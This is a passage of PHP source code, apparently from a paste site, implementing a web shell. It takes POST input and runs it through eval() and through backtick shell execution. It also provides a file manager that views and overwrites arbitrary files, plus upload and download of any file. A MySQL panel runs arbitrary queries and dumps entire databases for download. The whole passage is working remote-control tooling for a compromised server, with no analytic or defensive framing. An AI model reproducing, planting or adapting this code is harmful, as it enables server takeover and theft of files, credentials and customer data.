  3301. case 'eval':
  3302. {
  3303. $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
  3304. $eval_value=magic_q($eval_value);
  3305. $action=isset($_POST['action'])?$_POST['action']:'eval';
  3306. if($action=='eval_in_html') @eval($eval_value);
  3307. else
  3308. {
  3309. echo($head);
  3310. ?>
  3311. <hr>
  3312.  
  3313. <hr>
  3314. <?
  3315. }
  3316. break;
  3317. }
  3318. case 'cmd':
  3319. {
  3320. $cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
  3321. $work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
  3322. $action=isset($_POST['action'])?$_POST['action']:'cmd';
  3323. if(@is_dir($work_dir))
  3324. {
  3325. @chdir($work_dir);
  3326. $work_dir=getcwd();
  3327. if($work_dir=='')$work_dir='/';
  3328. else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
  3329. }
  3330. else if(file_exists($work_dir))$work_dir=realpath($work_dir);
  3331. $work_dir=str_replace('\\','/',$work_dir);
  3332. $e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
  3333. switch($action)
  3334. {
  3335. case 'cmd' :
  3336. {
  3337. echo($head);
  3338. ?>
  3339.  
  3340. <pre>
  3341. <?
  3342. if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
  3343. else
  3344. {
  3345. $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
  3346. if(@is_dir($work_dir))
  3347. {
  3348. echo('<H1>File Manager;</H1><hr>');
  3349. echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
  3350. $handle=@opendir($work_dir);
  3351. if($handle)
  3352. {
  3353. while(false!==($fn=readdir($handle))){$files[]=$fn;};
  3354. @closedir($handle);
  3355. sort($files);
  3356. $not_dirs=array();
  3357. for($i=0;$i<sizeof($files);$i++)
  3358. {
  3359. $fn=$files[$i];
  3360. if(is_dir($fn))
  3361. {
  3362. echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)
  3363.  
  3364. >format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
  3365. if($winda===false)
  3366. {
  3367. $owner=@posix_getpwuid(@fileowner($work_dir.$fn));
  3368. $group=@posix_getgrgid(@filegroup($work_dir.$fn));
  3369. printf("% 20s|% -20s",$owner['name'],$group['name']);
  3370. }
  3371. echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
  3372. printf("% 20s ",@filesize($work_dir.$fn).'B');
  3373. printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
  3374. }
  3375. else {$not_dirs[]=$fn;}
  3376. }
  3377. for($i=0;$i<sizeof($not_dirs);$i++)
  3378. {
  3379. $fn=$not_dirs[$i];
  3380. echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',
  3381.  
  3382. $fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
  3383. if($winda===false)
  3384. {
  3385. $owner=@posix_getpwuid(@fileowner($work_dir.$fn));
  3386. $group=@posix_getgrgid(@filegroup($work_dir.$fn));
  3387. printf("% 20s|% -20s",$owner['name'],$group['name']);
  3388. }
  3389. echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
  3390. printf("% 20s ",@filesize($work_dir.$fn).'B');
  3391. printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
  3392. }
  3393. echo('</pre><hr>');
  3394. ?>
  3395. <form name='list' method=post>
  3396. <input name='work_dir' type=hidden size=120><br>
  3397. <input name='page' value='cmd' type=hidden>
  3398. <input name='f_action' value='view' type=hidden>
  3399. </form>
  3400. <?
  3401. } else echo('Error Listing '.$e_work_dir);
  3402. }
  3403. else
  3404. switch($f_action)
  3405. {
  3406. case 'view':
  3407. {
  3408. echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
  3409. $f=@fopen($work_dir,'r');
  3410. ?>
  3411. <form method=post>
  3412. <textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
  3413. <input name='page' value='cmd' type=hidden>
  3414. <input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
  3415. <input name='f_action' value='save' type=submit>
  3416. </form>
  3417. <?
  3418. break;
  3419. }
  3420. case 'save' :
  3421. {
  3422. $file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
  3423. $f=@fopen($work_dir,'w');
  3424. if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
  3425. else
  3426. {
  3427. fwrite($f,$file_text);
  3428. fclose($f);
  3429. echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
  3430. }
  3431. break;
  3432. }
  3433. }
  3434. break;
  3435. }
  3436. break;
  3437. }
  3438. case 'upload' :
  3439. {
  3440. if($work_dir=='')$work_dir='/';
  3441. else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
  3442. $f=$_FILES["filename"]["name"];
  3443. if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
  3444. else
  3445. {
  3446. echo('file is uploaded in '.$e_work_dir);
  3447. }
  3448. break;
  3449. }
  3450. case 'download' :
  3451. {
  3452. $fname=isset($_POST['fname'])?$_POST['fname']:'';
  3453. $temp_file=isset($_POST['temp_file'])?'on':'nn';
  3454. $f=@fopen($fname,'r');
  3455. if(!($f)) echo('file is not exists');
  3456. else
  3457. {
  3458. $archive=isset($_POST['archive'])?$_POST['archive']:'';
  3459. if($archive=='gzip')
  3460. {
  3461. Header("Content-Type:application/x-gzip\n");
  3462. $s=gzencode(fread($f,filesize($fname)));
  3463. Header('Content-Length: '.strlen($s)."\n");
  3464. Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
  3465. echo($s);
  3466. }
  3467. else
  3468. {
  3469. Header("Content-Type:application/octet-stream\n");
  3470. Header('Content-Length: '.filesize($fname)."\n");
  3471. Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
  3472. ob_start();
  3473. while(feof($f)===false)
  3474. {
  3475. echo(fread($f,10000));
  3476. ob_flush();
  3477. }
  3478. }
  3479. }
  3480. }
  3481. }
  3482. break;
  3483. }
  3484. case 'mysql' :
  3485. {
  3486. $action=isset($_POST['action'])?$_POST['action']:'query';
  3487. $user=isset($_POST['user'])?$_POST['user']:'';
  3488. $passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
  3489. $db=isset($_POST['db'])?$_POST['db']:'';
  3490. $host=isset($_POST['host'])?$_POST['host']:'localhost';
  3491. $query=isset($_POST['query'])?magic_q($_POST['query']):'';
  3492. switch($action)
  3493. {
  3494. case 'dump' :
  3495. {
  3496. $mysql_link=@mysql_connect($host,$user,$passwd);
  3497. if(!($mysql_link)) echo('Connect error');
  3498. else
  3499. {
  3500. //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
  3501. $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
  3502. $archive=isset($_POST['archive'])?$_POST['archive']:'none';
  3503. if($archive!=='none')$to_file=false;
  3504. $db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
  3505. $table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
  3506. if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
  3507. else
  3508. {
  3509. $dump_file="# MySQL Dumper\n#db $db from $host\n";
  3510. ob_start();
  3511. if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
  3512. if($table_dump=='')
  3513. {
  3514. if(!$to_file)
  3515. {
  3516. header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
  3517. header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
  3518. }
  3519. $result=mysql_query('show tables',$mysql_link);
  3520. for($i=0;$i<mysql_num_rows($result);$i++)
  3521. {
  3522. $rows=mysql_fetch_array($result);
  3523. $result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
  3524. if(!$result2)$dump_file.='#error table '.$rows[0];
  3525. else
  3526. {
  3527. $dump_file.='create table `'.$rows[0]."`(\n";
  3528. for($j=0;$j<mysql_num_rows($result2)-1;$j++)
  3529. {
  3530. $rows2=mysql_fetch_array($result2);
  3531. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
  3532. }
  3533. $rows2=mysql_fetch_array($result2);
  3534. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
  3535. $type[$j]=$rows2[1];
  3536. $dump_file.=");\n";
  3537. mysql_free_result($result2);
  3538. $result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
  3539. $columns=$j-1;
  3540. for($j=0;$j<mysql_num_rows($result2);$j++)
  3541. {
  3542. $rows2=mysql_fetch_array($result2);
  3543. $dump_file.='insert into `'.$rows[0].'` values (';
  3544. for($k=0;$k<$columns;$k++)
  3545. {
  3546. $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
  3547. }
  3548. $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
  3549. if($archive=='none')
  3550. {
  3551. if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
  3552. else
  3553. {
  3554. echo($dump_file);
  3555. ob_flush();
  3556. }
  3557. $dump_file='';
  3558. }
  3559. }
  3560. mysql_free_result($result2);
  3561. }
  3562. }
  3563. mysql_free_result($result);
  3564. if($archive!='none')
  3565. {
  3566. $dump_file=gzencode($dump_file);
  3567. header('Content-Length: '.strlen($dump_file)."\n");
  3568. echo($dump_file);
  3569. }
  3570. else if($t_f)
  3571. {
  3572. fclose($t_f);
  3573. echo('Dump for '.$db_dump.' now in '.$to_file);
  3574. }
  3575. }
  3576. else
  3577. {
  3578. $result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
  3579. if(!$result2)echo('error table '.$table_dump);
  3580. else
  3581. {
  3582. if(!$to_file)
  3583. {
  3584. header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
  3585. header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
  3586. }
  3587. if($to_file===false)
  3588. {
  3589. header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
  3590. header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
  3591. }
  3592. $dump_file.="create table `{$table_dump}`(\n";
  3593. for($j=0;$j<mysql_num_rows($result2)-1;$j++)
  3594. {
  3595. $rows2=mysql_fetch_array($result2);
  3596. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
  3597. }
  3598. $rows2=mysql_fetch_array($result2);
  3599. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
  3600. $type[$j]=$rows2[1];
  3601. $dump_file.=");\n";
  3602. mysql_free_result($result2);
  3603. $result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
  3604. $columns=$j-1;
  3605. for($j=0;$j<mysql_num_rows($result2);$j++)
  3606. {
  3607. $rows2=mysql_fetch_array($result2);
  3608. $dump_file.='insert into `'.$table_dump.'` values (';
  3609. for($k=0;$k<$columns;$k++)
  3610. {
  3611. $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
  3612. }
  3613. $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
  3614. if($archive=='none')
  3615. {
  3616. if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
  3617. else
  3618. {
  3619. echo($dump_file);
  3620. ob_flush();
  3621. }
  3622. $dump_file='';
  3623. }
  3624. }
  3625. mysql_free_result($result2);
  3626. if($archive!='none')
  3627. {
  3628. $dump_file=gzencode($dump_file);
  3629. header('Content-Length: '.strlen($dump_file)."\n");
  3630. echo $dump_file;
  3631. }else if($t_f)
  3632. {
  3633. fclose($t_f);
  3634. echo('Dump for '.$db_dump.' now in '.$to_file);
  3635. }
  3636. }
  3637. }
  3638. }
  3639. }
  3640. break;
  3641. }
  3642. case 'query' :
  3643. {
  3644. echo($head);
  3645. ?>
  3646. <hr>
  3647. <form method=post>
  3648. <table>
  3649. <td>
  3650. <table align=left>
  3651. <tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host'
  3652.  
  3653. type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
  3654. <tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
  3655. </table>
  3656. </td>
  3657. <td>
  3658. <table>
  3659. <tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
  3660. <tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
  3661. <input name='archive' type=radio value='none'>without arch
  3662. <input name='archive' type=radio value='gzip' checked=true>gzip archive
  3663. <tr><td><input type=submit name='action' value='dump'></td></tr>
  3664. <tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
  3665. </table>
  3666. </td>
  3667. </table>
  3668. <input name='page' value='mysql' type=hidden>
  3669. <input name='action' value='query' type=submit>
  3670. </form>
  3671. <hr>
  3672. <?
  3673. $mysql_link=@mysql_connect($host,$user,$passwd);
  3674. if(!($mysql_link)) echo('Connect error');
  3675. else
  3676. {
  3677. if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
  3678. //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
  3679. $result=@mysql_query($query,$mysql_link);
  3680. if(!($result))echo(mysql_error());
  3681. else
  3682. {
  3683. echo("<table valign=top align=left>\n<tr>");
  3684. for($i=0;$i<mysql_num_fields($result);$i++)
  3685. echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>');
  3686. echo("\n</tr>\n");
  3687. for($i=0;$i<mysql_num_rows($result);$i++)
  3688. {
  3689. $rows=mysql_fetch_array($result);
  3690. echo('<tr valign=top align=left>');
  3691. for($j=0;$j<mysql_num_fields($result);$j++)
  3692. {
  3693. echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
  3694. }
  3695. echo("</tr>\n");
  3696. }
  3697. echo("</table>\n");
  3698. }
  3699. mysql_close($mysql_link);
  3700. }
  3701. break;
  3702. }
  3703. }
  3704. break;
  3705. }
  3706. }
  3707. ?>
Add Comment
Please, Sign In to add comment